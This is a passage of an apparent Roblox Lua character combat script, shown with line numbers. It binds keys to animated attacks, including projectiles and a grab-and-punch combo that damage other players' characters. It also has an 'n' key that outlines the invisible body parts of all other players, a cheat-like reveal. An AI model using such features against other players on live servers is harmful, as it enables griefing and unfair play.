			elseif Charging == false then break
12083
			end
12084
		end
12085
	end)
12086
	Spawn(function()
12087
        while rs:wait() do
12088
            if p.Transparency >= 1 then p:Destroy() break end
12089
            p.CFrame = p.CFrame*CFrame.Angles(math.rad(2),math.rad(2),math.rad(2))+Vector3.new(0,0.2,0)
12090
            p.Transparency = p.Transparency+0.01
12091
        end
12092
    end)
12093
    wait(.3)
12094
until Charging == false
12095
			end
12096
		end
12097
	end
12098
end)
12099
----------------------------------------------------
12100
mouse.KeyUp:connect(function(key)
12101
	if key == "r" then
12102
		if Charging == true then
12103
			Charging = false
12104
				pt:Destroy()
12105
				pt2:Destroy()
12106
				bl:Destroy()
12107
			if Debounces.CanAttack == false then
12108
				Debounces.CanAttack = true
12109
				Debounces.NoIdl = false
12110
				Debounces.on = false
12111
			end
12112
		end
12113
	end
12114
end)
12115
----------------------------------------------------
12116
mouse.KeyDown:connect(function(key)
12117
	if key == "g" then
12118
		if Debounces.CanAttack == true then
12119
			Debounces.CanAttack = false
12120
			Debounces.NoIdl = true
12121
			Debounces.on = true
12122
				local shell = Instance.new("Part",torso)
12123
				shell.BrickColor = BrickColor.new("Royal purple")
12124
				shell.Anchored = true
12125
				shell.CanCollide = false
12126
				shell.Locked = true
12127
				shell.TopSurface = "SmoothNoOutlines"
12128
				shell.BottomSurface = "SmoothNoOutlines"
12129
				shell.Size = Vector3.new(1,1,1)
12130
				shellm = Instance.new("SpecialMesh",shell)
12131
				shellm.MeshType = "Sphere"
12132
				shellm.Scale = Vector3.new(1,1,1)
12133
				local shell2 = Instance.new("Part",torso)
12134
				shell2.BrickColor = BrickColor.new("Royal purple")
12135
				shell2.Anchored = true
12136
				shell2.CanCollide = false
12137
				shell2.Locked = true
12138
				shell2.TopSurface = "SmoothNoOutlines"
12139
				shell2.BottomSurface = "SmoothNoOutlines"
12140
				shell2.Size = Vector3.new(1,1,1)
12141
				shellm2 = Instance.new("SpecialMesh",shell2)
12142
				shellm2.MeshType = "Sphere"
12143
				shellm2.Scale = Vector3.new(1,1,1)
12144
12145
function FindNearestTorso(Position,Distance,SinglePlayer)
12146
    if SinglePlayer then return(SinglePlayer.Torso.CFrame.p -Position).magnitude < Distance end
12147
        local List = {}
12148
        for i,v in pairs(workspace:GetChildren())do
12149
            if v:IsA("Model")then
12150
                if v:findFirstChild("Torso")then
12151
                    if v ~= char then
12152
                        if(v.Torso.Position -Position).magnitude <= Distance then
12153
                            table.insert(List,v)
12154
                        end
12155
                    end
12156
                end
12157
            end
12158
        end
12159
    return List
12160
end
12161
12162
Shell = function()
12163
local X = Instance.new("Part",char)
12164
local O = Instance.new("ObjectValue",X)
12165
        O.Name = "creator"
12166
        X.Locked = true
12167
		X.Name = "Shell"
12168
        X.Anchored = false
12169
        X.CanCollide = false
12170
        X.Transparency = 0
12171
        X.Reflectance = 0
12172
        X.BottomSurface = 0
12173
        X.TopSurface = 0
12174
        X.Shape = 0
12175
        local V = Instance.new("ObjectValue",X)
12176
        V.Value = char
12177
        V.Name = "creator"
12178
        X.BrickColor = BrickColor.new("Royal purple")
12179
        X.Size = Vector3.new(1,1,1)
12180
        --X.Material = "Neon"
12181
        local Z = Instance.new("SpecialMesh",X)
12182
        Z.MeshType = "Sphere"
12183
        Z.Scale = Vector3.new(1,1,1)
12184
        X.CFrame = rarm.CFrame*CFrame.new(0,-6,0)
12185
        local bv = Instance.new("BodyVelocity",X)
12186
        bv.maxForce = Vector3.new(99999,99999,99999)
12187
        X.CFrame = CFrame.new(X.Position,root.CFrame.lookVector*10)
12188
        bv.velocity = root.CFrame.lookVector*65
12189
Explode = X.Touched:connect(function(hit)
12190
        if hit ~= char and hit.Name ~= "Shell" and hit:IsA("Part") or hit:IsA("BasePart}") then
12191
        local cf = X.CFrame
12192
        bv:Destroy()
12193
        X.Anchored = true
12194
        Z:Remove()
12195
        Explode:disconnect()
12196
        X.Size = Vector3.new(3,3,3)
12197
        X.Touched:connect(function(hit) end)
12198
        X.CanCollide = false
12199
		for i,v in pairs(FindNearestTorso(X.CFrame.p,40))do
12200
			if v:FindFirstChild('Humanoid') then
12201
				v.Humanoid:TakeDamage(math.random(6,12))
12202
			end
12203
		end
12204
			for i = 1, (40) do rs:wait()
12205
				X.Transparency = X.Transparency + (1/40)
12206
				X.Size = X.Size + Vector3.new(1,1,1)
12207
				X.CFrame = cf
12208
			end
12209
		X:Destroy()
12210
		end
12211
	end)
12212
end
12213
				Shell()
12214
				for i = 1, 10 do
12215
					shell.CFrame = rarm.CFrame * CFrame.new(0,-1,0)
12216
					shell2.CFrame = larm.CFrame * CFrame.new(0,-1,0)
12217
					rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(110)), 0.7)
12218
					larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-110)), 0.7)
12219
					hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-10),math.rad(0),0), 0.7)
12220
					torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(0), 0), 0.7)
12221
					lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(-20)), 0.7)
12222
					rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(20)), 0.7)
12223
					if Debounces.on == false then break end
12224
					rs:wait()
12225
				end
12226
				Shell()
12227
				shell.Transparency = 1
12228
				for i = 1, 10 do
12229
					shell.CFrame = rarm.CFrame * CFrame.new(0,-1,0)
12230
					shell2.CFrame = larm.CFrame * CFrame.new(0,-1,0)
12231
					rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-40)), 0.7)
12232
					larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-110)), 0.7)
12233
					hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-10),math.rad(-50),0), 0.7)
12234
					torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(50), 0), 0.7)
12235
					lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(10), math.rad(0), math.rad(-20)), 0.7)
12236
					rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(0), math.rad(20)), 0.7)
12237
					if Debounces.on == false then break end
12238
					rs:wait()
12239
				end
12240
				Shell()
12241
				shell.Transparency = 0
12242
				shell2.Transparency = 1
12243
				for i = 1, 10 do
12244
					shell.CFrame = rarm.CFrame * CFrame.new(0,-1,0)
12245
					shell2.CFrame = larm.CFrame * CFrame.new(0,-1,0)
12246
					rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(110)), 0.7)
12247
					larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(40)), 0.7)
12248
					hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-10),math.rad(50),0), 0.7)
12249
					torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(-50), 0), 0.7)
12250
					lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(0), math.rad(-20)), 0.7)
12251
					rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(10), math.rad(0), math.rad(20)), 0.7)
12252
					if Debounces.on == false then break end
12253
					rs:wait()
12254
				end
12255
				Shell()
12256
				shell2.Transparency = 0
12257
				shell.Transparency = 1
12258
				for i = 1, 10 do
12259
					shell.CFrame = rarm.CFrame * CFrame.new(0,-1,0)
12260
					shell2.CFrame = larm.CFrame * CFrame.new(0,-1,0)
12261
					rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-40)), 0.7)
12262
					larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-110)), 0.7)
12263
					hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-10),math.rad(-50),0), 0.7)
12264
					torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(50), 0), 0.7)
12265
					lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(10), math.rad(0), math.rad(-20)), 0.7)
12266
					rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(0), math.rad(20)), 0.7)
12267
					if Debounces.on == false then break end
12268
					rs:wait()
12269
				end
12270
				Shell()
12271
				shell.Transparency = 0
12272
				shell2.Transparency = 1
12273
				for i = 1, 10 do
12274
					shell.CFrame = rarm.CFrame * CFrame.new(0,-1,0)
12275
					shell2.CFrame = larm.CFrame * CFrame.new(0,-1,0)
12276
					rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(110)), 0.7)
12277
					larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(40)), 0.7)
12278
					hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-10),math.rad(50),0), 0.7)
12279
					torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(-50), 0), 0.7)
12280
					lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(0), math.rad(-20)), 0.7)
12281
					rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(10), math.rad(0), math.rad(20)), 0.7)
12282
					if Debounces.on == false then break end
12283
					rs:wait()
12284
				end
12285
				Shell()
12286
				shell2.Transparency = 0
12287
				shell.Transparency = 1
12288
				for i = 1, 10 do
12289
					shell.CFrame = rarm.CFrame * CFrame.new(0,-1,0)
12290
					shell2.CFrame = larm.CFrame * CFrame.new(0,-1,0)
12291
					rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-40)), 0.7)
12292
					larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-110)), 0.7)
12293
					hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-10),math.rad(-50),0), 0.7)
12294
					torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(50), 0), 0.7)
12295
					lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(10), math.rad(0), math.rad(-20)), 0.7)
12296
					rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(0), math.rad(20)), 0.7)
12297
					if Debounces.on == false then break end
12298
					rs:wait()
12299
				end
12300
				Shell()
12301
				shell.Transparency = 0
12302
				shell2.Transparency = 1
12303
				for i = 1, 10 do
12304
					shell.CFrame = rarm.CFrame * CFrame.new(0,-1,0)
12305
					shell2.CFrame = larm.CFrame * CFrame.new(0,-1,0)
12306
					rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(110)), 0.7)
12307
					hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-10),math.rad(50),0), 0.5)
12308
					larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(40)), 0.7)
12309
					torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(-50), 0), 0.7)
12310
					lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(0), math.rad(-20)), 0.7)
12311
					rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(10), math.rad(0), math.rad(20)), 0.7)
12312
					if Debounces.on == false then break end
12313
					rs:wait()
12314
				end
12315
				Shell()
12316
				shell2.Transparency = 0
12317
				shell.Transparency = 1
12318
				for i = 1, 10 do
12319
					shell.CFrame = rarm.CFrame * CFrame.new(0,-1,0)
12320
					shell2.CFrame = larm.CFrame * CFrame.new(0,-1,0)
12321
					rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-40)), 0.7)
12322
					larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-110)), 0.7)
12323
					hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-10),math.rad(-50),0), 0.7)
12324
					torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(50), 0), 0.7)
12325
					lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(10), math.rad(0), math.rad(-20)), 0.7)
12326
					rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(0), math.rad(20)), 0.7)
12327
					if Debounces.on == false then break end
12328
					rs:wait()
12329
				end
12330
				Shell()
12331
				shell.Transparency = 0
12332
				shell2.Transparency = 1
12333
				for i = 1, 10 do
12334
					shell.CFrame = rarm.CFrame * CFrame.new(0,-1,0)
12335
					shell2.CFrame = larm.CFrame * CFrame.new(0,-1,0)
12336
					rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(110)), 0.7)
12337
					larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(40)), 0.7)
12338
					hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-10),math.rad(50),0), 0.7)
12339
					torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(-50), 0), 0.7)
12340
					lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(0), math.rad(-20)), 0.7)
12341
					rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(10), math.rad(0), math.rad(20)), 0.7)
12342
					if Debounces.on == false then break end
12343
					rs:wait()
12344
				end
12345
				Shell()
12346
				shell2.Transparency = 0
12347
				shell.Transparency = 1
12348
				for i = 1, 10 do
12349
					shell.CFrame = rarm.CFrame * CFrame.new(0,-1,0)
12350
					shell2.CFrame = larm.CFrame * CFrame.new(0,-1,0)
12351
					rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-40)), 0.7)
12352
					larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-110)), 0.7)
12353
					hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-10),math.rad(-50),0), 0.7)
12354
					torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(50), 0), 0.7)
12355
					lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(10), math.rad(0), math.rad(-20)), 0.7)
12356
					rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(0), math.rad(20)), 0.7)
12357
					if Debounces.on == false then break end
12358
					rs:wait()
12359
				end
12360
				Shell()
12361
				shell.Transparency = 0
12362
				shell2.Transparency = 1
12363
				for i = 1, 10 do
12364
					shell.CFrame = rarm.CFrame * CFrame.new(0,-1,0)
12365
					shell2.CFrame = larm.CFrame * CFrame.new(0,-1,0)
12366
					rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(110)), 0.7)
12367
					larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(40)), 0.7)
12368
					hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-10),math.rad(50),0), 0.7)
12369
					torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(-50), 0), 0.7)
12370
					lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(0), math.rad(-20)), 0.7)
12371
					rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(10), math.rad(0), math.rad(20)), 0.7)
12372
					if Debounces.on == false then break end
12373
					rs:wait()
12374
				end
12375
				Shell()
12376
				shell2.Transparency = 0
12377
				shell.Transparency = 1
12378
				for i = 1, 10 do
12379
					shell.CFrame = rarm.CFrame * CFrame.new(0,-1,0)
12380
					shell2.CFrame = larm.CFrame * CFrame.new(0,-1,0)
12381
					rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-40)), 0.7)
12382
					larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-110)), 0.7)
12383
					hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-10),math.rad(-50),0), 0.7)
12384
					torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(50), 0), 0.7)
12385
					lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(10), math.rad(0), math.rad(-20)), 0.7)
12386
					rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(0), math.rad(20)), 0.7)
12387
					if Debounces.on == false then break end
12388
					rs:wait()
12389
				end
12390
				Shell()
12391
				shell.Transparency = 0
12392
				shell2.Transparency = 1
12393
				for i = 1, 10 do
12394
					shell.CFrame = rarm.CFrame * CFrame.new(0,-1,0)
12395
					shell2.CFrame = larm.CFrame * CFrame.new(0,-1,0)
12396
					rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(110)), 0.7)
12397
					larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.6,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(40)), 0.7)
12398
					hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-10),math.rad(50),0), 0.7)
12399
					torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(-50), 0), 0.7)
12400
					lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(0), math.rad(-20)), 0.7)
12401
					rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(10), math.rad(0), math.rad(20)), 0.7)
12402
					if Debounces.on == false then break end
12403
					rs:wait()
12404
				end
12405
				shell.Transparency = 1
12406
			if Debounces.CanAttack == false then
12407
				Debounces.CanAttack = true
12408
				Debounces.NoIdl = false
12409
				Debounces.on = false
12410
			end
12411
		end
12412
	end
12413
end)
12414
----------------------------------------------------
12415
Search = false
12416
mouse.KeyDown:connect(function(key)
12417
	if key == "n" then
12418
		if Search == false then
12419
			Search = true
12420
			for i,v in pairs(game.Players:getPlayers()) do
12421
				if v.Name~=char.Name then
12422
					for j,k in pairs(v.Character:GetChildren()) do
12423
						if k:IsA("BasePart") and k.Transparency >= 1 then
12424
							bawx=Instance.new("SelectionBox",cam)
12425
							bawx.Color = BrickColor.new("Bright red")
12426
							bawx.Transparency = .5
12427
							bawx.Adornee = k
12428
						end
12429
                    end
12430
                end
12431
            end
12432
		elseif Search == true then
12433
			Search = false
12434
			for i, v in pairs(cam:GetChildren()) do
12435
				if v:IsA("SelectionBox") then
12436
					v:Destroy()
12437
				end
12438
			end
12439
	    end
12440
    end
12441
end)
12442
----------------------------------------------------
12443
Grab = false
12444
mouse.KeyDown:connect(function(key)
12445
    if key == "z" then
12446
        Debounces.on = true
12447
        Debounces.NoIdl = true
12448
		Debounces.ks = true
12449
        if Grab == false then
12450
        gp = nil
12451
		for i = 1, 20 do
12452
			rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.65,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(110)), 0.2)
12453
			larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.65,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-110)), 0.2)
12454
			hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-10),math.rad(0),0), 0.2)
12455
			torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(0), 0), 0.2)
12456
			lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(30), math.rad(-20)), 0.2)
12457
			rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(10), math.rad(-15), math.rad(20)), 0.2)
12458
			if Debounces.on == false then break end
12459
			rs:wait()
12460
		end
12461
        con1=larm.Touched:connect(function(hit) -- this is grab
12462
            ht = hit.Parent
12463
            hum1=ht:FindFirstChild('Humanoid')
12464
            if hum1 ~= nil then
12465
			    if Debounces.ks==true then
12466
                z = Instance.new("Sound",hed)
12467
                z.SoundId = "rbxassetid://169380525"
12468
                z.Volume = 1
12469
                z:Play()
12470
                Debounces.ks=false
12471
				end
12472
                hum1.PlatformStand=true
12473
                gp = ht
12474
                Grab = true
12475
                asd=weld5(root,ht:FindFirstChild("Torso"),CFrame.new(0,0,-2.4),CFrame.new(0,0,0))
12476
                asd.Parent = larm
12477
                asd.Name = "asd"
12478
                asd.C0=asd.C0*CFrame.Angles(math.rad(0),math.rad(180),0)
12479
            --[[elseif hum1 == nil then
12480
                con1:disconnect()
12481
                wait() return]]--
12482
            end
12483
        end)
12484
		for i = 1, 20 do
12485
			rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.3,0.65,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-40)), 0.2)
12486
			larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.3,0.65,0)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(40)), 0.2)
12487
			hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-10),math.rad(0),0), 0.2)
12488
			torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(0), 0), 0.2)
12489
			lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(10), math.rad(30), math.rad(-20)), 0.2)
12490
			rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(-10), math.rad(-15), math.rad(20)), 0.2)
12491
			if Debounces.on == false then break end
12492
			rs:wait()
12493
		end
12494
	if hum1 == nil then
12495
    Debounces.on = false
12496
    Debounces.NoIdl = false
12497
	end
12498
	con1:disconnect()
12499
    elseif Grab == true then
12500
        Grab = false
12501
		Punch()
12502
		z = Instance.new("Sound",hed)
12503
		z.SoundId = "rbxassetid://169380525"
12504
		z.Pitch = ptz[math.random(1,#ptz)]
12505
		z.Volume = 1
12506
		z:Play()
12507
		for i = 1, 10 do
12508
			rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.2,0.4,-.5)*CFrame.Angles(math.rad(80),math.rad(0),math.rad(-50)), 0.7)
12509
			larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.7,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(-110)), 0.7)
12510
			hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(90),0), 0.4)
12511
			torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(-90), 0), 0.6)
12512
			lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(-10)), 0.2)
12513
			rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(10)), 0.2)
12514
			if Debounces.on == false then break end
12515
			rs:wait()
12516
		end
12517
		Punch()
12518
		z = Instance.new("Sound",hed)
12519
		z.SoundId = "rbxassetid://169380525"
12520
		z.Pitch = ptz[math.random(1,#ptz)]
12521
		z.Volume = 1
12522
		z:Play()
12523
		for i = 1, 10 do
12524
			rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.7,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(110)), 0.6)
12525
			larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.7,0)*CFrame.Angles(math.rad(-40),math.rad(0),math.rad(20)), 0.7)
12526
			hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(-90),0), 0.4)
12527
			torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(90), 0), 0.65)
12528
			lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(-10)), 0.2)
12529
			rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(10)), 0.2)
12530
			if Debounces.on == false then break end
12531
			rs:wait()
12532
		end
12533
		Punch()
12534
		z = Instance.new("Sound",hed)
12535
		z.SoundId = "rbxassetid://169380525"
12536
		z.Pitch = ptz[math.random(1,#ptz)]
12537
		z.Volume = 1
12538
		z:Play()
12539
		for i = 1, 10 do
12540
			rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.2,0.4,-.5)*CFrame.Angles(math.rad(80),math.rad(0),math.rad(-50)), 0.7)
12541
			larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.7,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(-110)), 0.7)
12542
			hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(90),0), 0.4)
12543
			torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, -1, 0) * CFrame.Angles(0, math.rad(-90), 0), 0.6)
12544
			lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(-10)), 0.2)
12545
